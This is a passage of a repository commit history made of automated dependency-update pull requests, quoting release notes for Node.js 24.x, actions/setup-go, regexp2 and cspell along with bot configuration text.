\[[`eb8a0493d1`](https://redirect.github.com/nodejs/node/commit/eb8a0493d1)] - **src**: initial enablement of IsolateGroups (James M Snell) [#​60254](https://redirect.github.com/nodejs/node/pull/60254) - \[[`463c6450cf`](https://redirect.github.com/nodejs/node/commit/463c6450cf)] - **src**: use `Utf8Value` and `TwoByteValue` instead of V8 helpers (Anna Henningsen) [#​60244](https://redirect.github.com/nodejs/node/pull/60244) - \[[`b370e02789`](https://redirect.github.com/nodejs/node/commit/b370e02789)] - **src**: add a default branch for module phase (Chengzhong Wu) [#​60261](https://redirect.github.com/nodejs/node/pull/60261) - \[[`4e1c5c5601`](https://redirect.github.com/nodejs/node/commit/4e1c5c5601)] - **src**: make additional cleanups in node locks impl (James M Snell) [#​60061](https://redirect.github.com/nodejs/node/pull/60061) - \[[`f00d4c10fc`](https://redirect.github.com/nodejs/node/commit/f00d4c10fc)] - **src**: update locks to use DictionaryTemplate (James M Snell) [#​60061](https://redirect.github.com/nodejs/node/pull/60061) - \[[`1c8716e97c`](https://redirect.github.com/nodejs/node/commit/1c8716e97c)] - **test**: increase debugger waitFor timeout on macOS (Chengzhong Wu) [#​60367](https://redirect.github.com/nodejs/node/pull/60367) - \[[`17b4f38e9c`](https://redirect.github.com/nodejs/node/commit/17b4f38e9c)] - **test**: put helper in test-runner-output into common (Joyee Cheung) [#​60330](https://redirect.github.com/nodejs/node/pull/60330) - \[[`43b9ea8389`](https://redirect.github.com/nodejs/node/commit/43b9ea8389)] - **test**: fix small compile warning in test\_network\_requests\_buffer.cc (xiaocainiao633) [#​60281](https://redirect.github.com/nodejs/node/pull/60281) - \[[`38a62980ad`](https://redirect.github.com/nodejs/node/commit/38a62980ad)] - **test**: split test-runner-watch-mode-kill-signal (Joyee Cheung) [#​60298](https://redirect.github.com/nodejs/node/pull/60298) - \[[`34e4c8c84f`](https://redirect.github.com/nodejs/node/commit/34e4c8c84f)] - **test**: fix incorrect calculation in test-perf-hooks.js (Joyee Cheung) [#​60271](https://redirect.github.com/nodejs/node/pull/60271) - \[[`4481feb17b`](https://redirect.github.com/nodejs/node/commit/4481feb17b)] - **test**: parallelize test-without-async-context-frame correctly (Joyee Cheung) [#​60273](https://redirect.github.com/nodejs/node/pull/60273) - \[[`91ea9b06e0`](https://redirect.github.com/nodejs/node/commit/91ea9b06e0)] - **test**: skip sea tests on x64 macOS (Joyee Cheung) [#​60250](https://redirect.github.com/nodejs/node/pull/60250) - \[[`cedba09e60`](https://redirect.github.com/nodejs/node/commit/cedba09e60)] - **test**: move sea tests into test/sea (Joyee Cheung) [#​60250](https://redirect.github.com/nodejs/node/pull/60250) - \[[`635af55e12`](https://redirect.github.com/nodejs/node/commit/635af55e12)] - ***Revert*** "**test**: ensure message event fires in worker message port test" (Luigi Pinca) [#​60126](https://redirect.github.com/nodejs/node/pull/60126) - \[[`68f678028e`](https://redirect.github.com/nodejs/node/commit/68f678028e)] - **test**: skip tests that cause timeouts on IBM i (SRAVANI GUNDEPALLI) [#​60148](https://redirect.github.com/nodejs/node/pull/60148) - \[[`cc3a70598c`](https://redirect.github.com/nodejs/node/commit/cc3a70598c)] - **test**: deflake test-fs-promises-watch-iterator (Luigi Pinca) [#​60060](https://redirect.github.com/nodejs/node/pull/60060) - \[[`3d784dd766`](https://redirect.github.com/nodejs/node/commit/3d784dd766)] - **test**: prepare junit file attribute normalization (sangwook) [#​59432](https://redirect.github.com/nodejs/node/pull/59432) - \[[`84974d97ad`](https://redirect.github.com/nodejs/node/commit/84974d97ad)] - **test**: skip failing test on macOS 15.7+ (Antoine du Hamel) [#​60419](https://redirect.github.com/nodejs/node/pull/60419) - \[[`fabf8e4975`](https://redirect.github.com/nodejs/node/commit/fabf8e4975)] - **test,crypto**: fix conditional SHA3-\* skip on BoringSSL (Filip Skokan) [#​60379](https://redirect.github.com/nodejs/node/pull/60379) - \[[`8faa494bf2`](https://redirect.github.com/nodejs/node/commit/8faa494bf2)] - **test,crypto**: sha3 algorithms aren't supported with BoringSSL (Shelley Vohr) [#​60374](https://redirect.github.com/nodejs/node/pull/60374) - \[[`538a00c0f6`](https://redirect.github.com/nodejs/node/commit/538a00c0f6)] - **test,doc**: skip --max-old-space-size-percentage on 32-bit platforms (Asaf Federman) [#​60144](https://redirect.github.com/nodejs/node/pull/60144) - \[[`9ac5dbb694`](https://redirect.github.com/nodejs/node/commit/9ac5dbb694)] - **test\_runner**: use module.registerHooks in module mocks (Joyee Cheung) [#​60326](https://redirect.github.com/nodejs/node/pull/60326) - \[[`f6ff6e7166`](https://redirect.github.com/nodejs/node/commit/f6ff6e7166)] - **test\_runner**: fix suite timeout (Moshe Atlow) [#​59853](https://redirect.github.com/nodejs/node/pull/59853) - \[[`455bfeb52d`](https://redirect.github.com/nodejs/node/commit/455bfeb52d)] - **test\_runner**: add junit file attribute support (sangwook) [#​59432](https://redirect.github.com/nodejs/node/pull/59432) - \[[`223c5e105d`](https://redirect.github.com/nodejs/node/commit/223c5e105d)] - **tools**: update gyp-next to 0.20.5 (Node.js GitHub Bot) [#​60313](https://redirect.github.com/nodejs/node/pull/60313) - \[[`2949408fc1`](https://redirect.github.com/nodejs/node/commit/2949408fc1)] - **tools**: limit inspector protocol PR title length (Chengzhong Wu) [#​60324](https://redirect.github.com/nodejs/node/pull/60324) - \[[`b36a898650`](https://redirect.github.com/nodejs/node/commit/b36a898650)] - **tools**: fix inspector\_protocol updater (Chengzhong Wu) [#​60277](https://redirect.github.com/nodejs/node/pull/60277) - \[[`d60f002b62`](https://redirect.github.com/nodejs/node/commit/d60f002b62)] - **tools**: optimize wildcard execution in tools/test.py (Joyee Cheung) [#​60266](https://redirect.github.com/nodejs/node/pull/60266) - \[[`9d4e422419`](https://redirect.github.com/nodejs/node/commit/9d4e422419)] - **tools**: add inspector\_protocol updater (Chengzhong Wu) [#​60245](https://redirect.github.com/nodejs/node/pull/60245) - \[[`2f93a9894f`](https://redirect.github.com/nodejs/node/commit/2f93a9894f)] - **tools**: use cooldown property correctly (Rafael Gonzaga) [#​60134](https://redirect.github.com/nodejs/node/pull/60134) - \[[`9468ade95d`](https://redirect.github.com/nodejs/node/commit/9468ade95d)] - **typings**: add missing properties and method in Worker (Woohyun Sung) [#​60257](https://redirect.github.com/nodejs/node/pull/60257) - \[[`f611ec0a9e`](https://redirect.github.com/nodejs/node/commit/f611ec0a9e)] - **typings**: add missing properties in HTTPParser (Woohyun Sung) [#​60257](https://redirect.github.com/nodejs/node/pull/60257) - \[[`301c1347a1`](https://redirect.github.com/nodejs/node/commit/301c1347a1)] - **typings**: delete undefined property in ConfigBinding (Woohyun Sung) [#​60257](https://redirect.github.com/nodejs/node/pull/60257) - \[[`80fdb3d39b`](https://redirect.github.com/nodejs/node/commit/80fdb3d39b)] - **typings**: add buffer internalBinding typing (방진혁) [#​60163](https://redirect.github.com/nodejs/node/pull/60163) - \[[`8cb3b77039`](https://redirect.github.com/nodejs/node/commit/8cb3b77039)] - **util**: use more defensive code when inspecting error objects (Antoine du Hamel) [#​60139](https://redirect.github.com/nodejs/node/pull/60139) - \[[`748d4f6430`](https://redirect.github.com/nodejs/node/commit/748d4f6430)] - **util**: mark special properties when inspecting them (Ruben Bridgewater) [#​60131](https://redirect.github.com/nodejs/node/pull/60131) - \[[`6183a759d7`](https://redirect.github.com/nodejs/node/commit/6183a759d7)] - **vm**: make vm.Module.evaluate() conditionally synchronous (Joyee Cheung) [#​60205](https://redirect.github.com/nodejs/node/pull/60205) - \[[`4b8506628f`](https://redirect.github.com/nodejs/node/commit/4b8506628f)] - **win**: upgrade Visual Studio workload from 2019 to 2022 (Jiawen Geng) [#​60318](https://redirect.github.com/nodejs/node/pull/60318) ### [`v24.11.0`](https://redirect.github.com/nodejs/node/releases/tag/v24.11.0): 2025-10-28, Version 24.11.0 'Krypton' (LTS), @​richardlau [Compare Source](https://redirect.github.com/nodejs/node/compare/v24.10.0...v24.11.0) ##### Notable Changes This release marks the transition of Node.js 24.x into Long Term Support (LTS) with the codename 'Krypton'. It will continue to receive updates through to the end of April 2028. Other than updating metadata, such as the `process.release` object, to reflect that the release is LTS, no further changes from Node.js 24.10.0 are included. ##### Known issue An issue has been identified in the Node.js 24.x line with `Buffer.allocUnsafe` unintentionally returning zero-filled buffers. This API is [documented to return uninitialized memory](https://nodejs.org/docs/latest-v24.x/api/buffer.html#static-method-bufferallocunsafesize). The documented behavior will be restored in the next Node.js 24.x LTS release to bring it back in line with previous releases. For more information, see [#​60423](https://redirect.github.com/nodejs/node/issues/60423). ### [`v24.10.0`](https://redirect.github.com/nodejs/node/releases/tag/v24.10.0): 2025-10-08, Version 24.10.0 (Current), @​RafaelGSS [Compare Source](https://redirect.github.com/nodejs/node/compare/v24.9.0...v24.10.0) ##### Notable Changes - \[[`31bb476895`](https://redirect.github.com/nodejs/node/commit/31bb476895)] - **(SEMVER-MINOR)** **console**: allow per-stream `inspectOptions` option (Anna Henningsen) [#​60082](https://redirect.github.com/nodejs/node/pull/60082) - \[[`3b92be2fb8`](https://redirect.github.com/nodejs/node/commit/3b92be2fb8)] - **(SEMVER-MINOR)** **lib**: remove util.getCallSite (Rafael Gonzaga) [#​59980](https://redirect.github.com/nodejs/node/pull/59980) - \[[`18c79d9e1c`](https://redirect.github.com/nodejs/node/commit/18c79d9e1c)] - **(SEMVER-MINOR)** **sqlite**: create authorization api (Guilherme Araújo) [#​59928](https://redirect.github.com/nodejs/node/pull/59928) ##### Commits - \[[`e8cff3d51e`](https://redirect.github.com/nodejs/node/commit/e8cff3d51e)] - **benchmark**: remove unused variable from util/priority-queue (Bruno Rodrigues) [#​59872](https://redirect.github.com/nodejs/node/pull/59872) - \[[`03294252ab`](https://redirect.github.com/nodejs/node/commit/03294252ab)] - **benchmark**: update count to n in permission startup (Bruno Rodrigues) [#​59872](https://redirect.github.com/nodejs/node/pull/59872) - \[[`3c8a609d9b`](https://redirect.github.com/nodejs/node/commit/3c8a609d9b)] - **benchmark**: update num to n in dgram offset-length (Bruno Rodrigues) [#​59872](https://redirect.github.com/nodejs/node/pull/59872) - \[[`7b2032b13e`](https://redirect.github.com/nodejs/node/commit/7b2032b13e)] - **benchmark**: adjust dgram offset-length len values (Bruno Rodrigues) [#​59708](https://redirect.github.com/nodejs/node/pull/59708) - \[[`552d887aee`](https://redirect.github.com/nodejs/node/commit/552d887aee)] - **benchmark**: update num to n in dgram offset-length (Bruno Rodrigues) [#​59708](https://redirect.github.com/nodejs/node/pull/59708) - \[[`31bb476895`](https://redirect.github.com/nodejs/node/commit/31bb476895)] - **(SEMVER-MINOR)** **console**: allow per-stream `inspectOptions` option (Anna Henningsen) [#​60082](https://redirect.github.com/nodejs/node/pull/60082) - \[[`0bf022d4c0`](https://redirect.github.com/nodejs/node/commit/0bf022d4c0)] - **console,util**: improve array inspection performance (Ruben Bridgewater) [#​60037](https://redirect.github.com/nodejs/node/pull/60037) - \[[`04d568e591`](https://redirect.github.com/nodejs/node/commit/04d568e591)] - **deps**: V8: cherry-pick [`f93055f`](https://redirect.github.com/nodejs/node/commit/f93055fbd5aa) (Olivier Flückiger) [#​60105](https://redirect.github.com/nodejs/node/pull/60105) - \[[`621058b3bf`](https://redirect.github.com/nodejs/node/commit/621058b3bf)] - **deps**: update archs files for openssl-3.5.4 (Node.js GitHub Bot) [#​60101](https://redirect.github.com/nodejs/node/pull/60101) - \[[`81b3009fe6`](https://redirect.github.com/nodejs/node/commit/81b3009fe6)] - **deps**: upgrade openssl sources to openssl-3.5.4 (Node.js GitHub Bot) [#​60101](https://redirect.github.com/nodejs/node/pull/60101) - \[[`dc44c9f349`](https://redirect.github.com/nodejs/node/commit/dc44c9f349)] - **deps**: upgrade npm to 11.6.1 (npm team) [#​60012](https://redirect.github.com/nodejs/node/pull/60012) - \[[`ec0f137198`](https://redirect.github.com/nodejs/node/commit/ec0f137198)] - **deps**: update ada to 3.3.0 (Node.js GitHub Bot) [#​60045](https://redirect.github.com/nodejs/node/pull/60045) - \[[`f490f91874`](https://redirect.github.com/nodejs/node/commit/f490f91874)] - **deps**: update amaro to 1.1.4 (pmarchini) [#​60044](https://redirect.github.com/nodejs/node/pull/60044) - \[[`de7a7cd0d7`](https://redirect.github.com/nodejs/node/commit/de7a7cd0d7)] - **deps**: update ada to 3.2.9 (Node.js GitHub Bot) [#​59987](https://redirect.github.com/nodejs/node/pull/59987) - \[[`a533e5b5db`](https://redirect.github.com/nodejs/node/commit/a533e5b5db)] - **doc**: add automated migration info to deprecations (Augustin Mauroy) [#​60022](https://redirect.github.com/nodejs/node/pull/60022) - \[[`7fb8fe4875`](https://redirect.github.com/nodejs/node/commit/7fb8fe4875)] - **doc**: fix typo on child\_process.md (Angelo Gazzola) [#​60114](https://redirect.github.com/nodejs/node/pull/60114) - \[[`24c1ef9846`](https://redirect.github.com/nodejs/node/commit/24c1ef9846)] - **doc**: remove optional title prefixes (Aviv K </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1ham9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
3d53c0387e |
chore(deps): update actions/setup-go action to v6 (#2178)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-go](https://redirect.github.com/actions/setup-go) | action | major | `v5.6.0` → `v6.1.0` | --- ### Release Notes <details> <summary>actions/setup-go (actions/setup-go)</summary> ### [`v6.1.0`](https://redirect.github.com/actions/setup-go/releases/tag/v6.1.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v6.0.0...v6.1.0) #### What's Changed ##### Enhancements - Fall back to downloading from go.dev/dl instead of storage.googleapis.com/golang by [@​nicholasngai](https://redirect.github.com/nicholasngai) in [#​665](https://redirect.github.com/actions/setup-go/pull/665) - Add support for .tool-versions file and update workflow by [@​priya-kinthali](https://redirect.github.com/priya-kinthali) in [#​673](https://redirect.github.com/actions/setup-go/pull/673) - Add comprehensive breaking changes documentation for v6 by [@​mahabaleshwars](https://redirect.github.com/mahabaleshwars) in [#​674](https://redirect.github.com/actions/setup-go/pull/674) ##### Dependency updates - Upgrade eslint-config-prettier from 10.0.1 to 10.1.8 and document breaking changes in v6 by [@​dependabot](https://redirect.github.com/dependabot) in [#​617](https://redirect.github.com/actions/setup-go/pull/617) - Upgrade actions/publish-action from 0.3.0 to 0.4.0 by [@​dependabot](https://redirect.github.com/dependabot) in [#​641](https://redirect.github.com/actions/setup-go/pull/641) - Upgrade semver and [@​types/semver](https://redirect.github.com/types/semver) by [@​dependabot](https://redirect.github.com/dependabot) in [#​652](https://redirect.github.com/actions/setup-go/pull/652) #### New Contributors - [@​nicholasngai](https://redirect.github.com/nicholasngai) made their first contribution in [#​665](https://redirect.github.com/actions/setup-go/pull/665) - [@​priya-kinthali](https://redirect.github.com/priya-kinthali) made their first contribution in [#​673](https://redirect.github.com/actions/setup-go/pull/673) - [@​mahabaleshwars](https://redirect.github.com/mahabaleshwars) made their first contribution in [#​674](https://redirect.github.com/actions/setup-go/pull/674) **Full Changelog**: <https://github.com/actions/setup-go/compare/v6...v6.1.0> ### [`v6.0.0`](https://redirect.github.com/actions/setup-go/releases/tag/v6.0.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.6.0...v6.0.0) ##### What's Changed ##### Breaking Changes - Improve toolchain handling to ensure more reliable and consistent toolchain selection and management by [@​matthewhughes934](https://redirect.github.com/matthewhughes934) in [#​460](https://redirect.github.com/actions/setup-go/pull/460) - Upgrade Nodejs runtime from node20 to node 24 by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​624](https://redirect.github.com/actions/setup-go/pull/624) Make sure your runner is on version v2.327.1 or later to ensure compatibility with this release. [See Release Notes](https://redirect.github.com/actions/runner/releases/tag/v2.327.1) ##### Dependency Upgrades - Upgrade [@​types/jest](https://redirect.github.com/types/jest) from 29.5.12 to 29.5.14 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​589](https://redirect.github.com/actions/setup-go/pull/589) - Upgrade [@​actions/tool-cache](https://redirect.github.com/actions/tool-cache) from 2.0.1 to 2.0.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​591](https://redirect.github.com/actions/setup-go/pull/591) - Upgrade [@​typescript-eslint/parser](https://redirect.github.com/typescript-eslint/parser) from 8.31.1 to 8.35.1 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​590](https://redirect.github.com/actions/setup-go/pull/590) - Upgrade undici from 5.28.5 to 5.29.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​594](https://redirect.github.com/actions/setup-go/pull/594) - Upgrade typescript from 5.4.2 to 5.8.3 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​538](https://redirect.github.com/actions/setup-go/pull/538) - Upgrade eslint-plugin-jest from 28.11.0 to 29.0.1 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​603](https://redirect.github.com/actions/setup-go/pull/603) - Upgrade `form-data` to bring in fix for critical vulnerability by [@​matthewhughes934](https://redirect.github.com/matthewhughes934) in [#​618](https://redirect.github.com/actions/setup-go/pull/618) - Upgrade actions/checkout from 4 to 5 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​631](https://redirect.github.com/actions/setup-go/pull/631) ##### New Contributors - [@​matthewhughes934](https://redirect.github.com/matthewhughes934) made their first contribution in [#​618](https://redirect.github.com/actions/setup-go/pull/618) - [@​salmanmkc](https://redirect.github.com/salmanmkc) made their first contribution in [#​624](https://redirect.github.com/actions/setup-go/pull/624) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v6.0.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1ham9yIl19--> --------- Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: Jocelyn Collado-Kuri <jcolladokuri@icloud.com> |
||
|
renovate-sh-app[bot]
|
f3fa2522e7 |
chore(deps): update dependency @types/react-dom to v18.3.7 (#2174)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@types/react-dom](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react-dom) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react-dom)) | [`18.3.1` → `18.3.7`](https://renovatebot.com/diffs/npm/@types%2freact-dom/18.3.1/18.3.7) |  |  | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
d3a974b8ce |
fix(deps): update module github.com/dlclark/regexp2 to v1.11.5 (#2175)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [github.com/dlclark/regexp2](https://redirect.github.com/dlclark/regexp2) | `v1.10.0` → `v1.11.5` |  |  | --- ### Release Notes <details> <summary>dlclark/regexp2 (github.com/dlclark/regexp2)</summary> ### [`v1.11.5`](https://redirect.github.com/dlclark/regexp2/compare/v1.11.4...v1.11.5) [Compare Source](https://redirect.github.com/dlclark/regexp2/compare/v1.11.4...v1.11.5) ### [`v1.11.4`](https://redirect.github.com/dlclark/regexp2/compare/v1.11.3...v1.11.4) [Compare Source](https://redirect.github.com/dlclark/regexp2/compare/v1.11.3...v1.11.4) ### [`v1.11.3`](https://redirect.github.com/dlclark/regexp2/compare/v1.11.2...v1.11.3) [Compare Source](https://redirect.github.com/dlclark/regexp2/compare/v1.11.2...v1.11.3) ### [`v1.11.2`](https://redirect.github.com/dlclark/regexp2/compare/v1.11.1...v1.11.2) [Compare Source](https://redirect.github.com/dlclark/regexp2/compare/v1.11.1...v1.11.2) ### [`v1.11.1`](https://redirect.github.com/dlclark/regexp2/compare/v1.11.0...v1.11.1) [Compare Source](https://redirect.github.com/dlclark/regexp2/compare/v1.11.0...v1.11.1) ### [`v1.11.0`](https://redirect.github.com/dlclark/regexp2/compare/v1.10.0...v1.11.0) [Compare Source](https://redirect.github.com/dlclark/regexp2/compare/v1.10.0...v1.11.0) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
ismail simsek
|
1bb5e8a5dd |
chore: bump @grafana/create-plugin configuration to 6.7.1 (#2167)
Co-authored-by: Zoltán Bedi <zoltan.bedi@gmail.com> |
||
|
ismail simsek
|
da27b9a917 |
chore(deps): update various dependencies (#2166)
yarn 4.9.4 -> 4.12.0 glob 11.1.0 -> 13.0.0 js-yaml 4.1.0 -> 4.1.1 |
||
|
renovate-sh-app[bot]
|
7ad809c654 |
chore(deps): update actions/setup-go action to v5.6.0 (#2164)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-go](https://redirect.github.com/actions/setup-go) | action | minor | `v5.3.0` → `v5.6.0` | --- ### Release Notes <details> <summary>actions/setup-go (actions/setup-go)</summary> ### [`v5.6.0`](https://redirect.github.com/actions/setup-go/releases/tag/v5.6.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.5.0...v5.6.0) #### What's Changed - Fall back to downloading from go.dev/dl instead of storage.googleapis.com/golang by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​689](https://redirect.github.com/actions/setup-go/pull/689) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v5.6.0> ### [`v5.5.0`](https://redirect.github.com/actions/setup-go/releases/tag/v5.5.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.4.0...v5.5.0) #### What's Changed ##### Bug fixes: - Update self-hosted environment validation by [@​priyagupta108](https://redirect.github.com/priyagupta108) in [#​556](https://redirect.github.com/actions/setup-go/pull/556) - Add manifest validation and improve error handling by [@​priyagupta108](https://redirect.github.com/priyagupta108) in [#​586](https://redirect.github.com/actions/setup-go/pull/586) - Update template link by [@​jsoref](https://redirect.github.com/jsoref) in [#​527](https://redirect.github.com/actions/setup-go/pull/527) ##### Dependency updates: - Upgrade [@​action/cache](https://redirect.github.com/action/cache) from 4.0.2 to 4.0.3 by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​574](https://redirect.github.com/actions/setup-go/pull/574) - Upgrade [@​actions/glob](https://redirect.github.com/actions/glob) from 0.4.0 to 0.5.0 by [@​dependabot](https://redirect.github.com/dependabot) in [#​573](https://redirect.github.com/actions/setup-go/pull/573) - Upgrade ts-jest from 29.1.2 to 29.3.2 by [@​dependabot](https://redirect.github.com/dependabot) in [#​582](https://redirect.github.com/actions/setup-go/pull/582) - Upgrade eslint-plugin-jest from 27.9.0 to 28.11.0 by [@​dependabot](https://redirect.github.com/dependabot) in [#​537](https://redirect.github.com/actions/setup-go/pull/537) #### New Contributors - [@​jsoref](https://redirect.github.com/jsoref) made their first contribution in [#​527](https://redirect.github.com/actions/setup-go/pull/527) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v5.5.0> ### [`v5.4.0`](https://redirect.github.com/actions/setup-go/releases/tag/v5.4.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v5.3.0...v5.4.0) #### What's Changed ##### Dependency updates : - Upgrade semver from 7.6.0 to 7.6.3 by [@​dependabot](https://redirect.github.com/dependabot) in [#​535](https://redirect.github.com/actions/setup-go/pull/535) - Upgrade eslint-config-prettier from 8.10.0 to 10.0.1 by [@​dependabot](https://redirect.github.com/dependabot) in [#​536](https://redirect.github.com/actions/setup-go/pull/536) - Upgrade [@​action/cache](https://redirect.github.com/action/cache) from 4.0.0 to 4.0.2 by [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) in [#​568](https://redirect.github.com/actions/setup-go/pull/568) - Upgrade undici from 5.28.4 to 5.28.5 by [@​dependabot](https://redirect.github.com/dependabot) in [#​541](https://redirect.github.com/actions/setup-go/pull/541) #### New Contributors - [@​aparnajyothi-y](https://redirect.github.com/aparnajyothi-y) made their first contribution in [#​568](https://redirect.github.com/actions/setup-go/pull/568) **Full Changelog**: <https://github.com/actions/setup-go/compare/v5...v5.4.0> </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLW1pbm9yIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
76c7603a4c |
chore(deps): update dependency cspell to v6.31.3 (#2165)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [cspell](https://cspell.org/) ([source](https://redirect.github.com/streetsidesoftware/cspell/tree/HEAD/packages/cspell)) | [`6.13.3` → `6.31.3`](https://renovatebot.com/diffs/npm/cspell/6.13.3/6.31.3) |  |  | --- ### Release Notes <details> <summary>streetsidesoftware/cspell (cspell)</summary> ### [`v6.31.3`](https://redirect.github.com/streetsidesoftware/cspell/releases/tag/v6.31.3) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3) #### What's Changed - fix: Fix dynamic loader on Windows by [@​Jason3S](https://redirect.github.com/Jason3S) in [#​4707](https://redirect.github.com/streetsidesoftware/cspell/pull/4707) **Full Changelog**: <https://github.com/streetsidesoftware/cspell/compare/v6.31.2...v6.31.3> ### [`v6.31.2`](https://redirect.github.com/streetsidesoftware/cspell/blob/HEAD/packages/cspell/CHANGELOG.md#6312-2023-04-14) [Compare Source](https://redirect.github.com/streetsidesoftware/cspell/compare/v6.31.1...v6.31.2) **Note:** Version bump 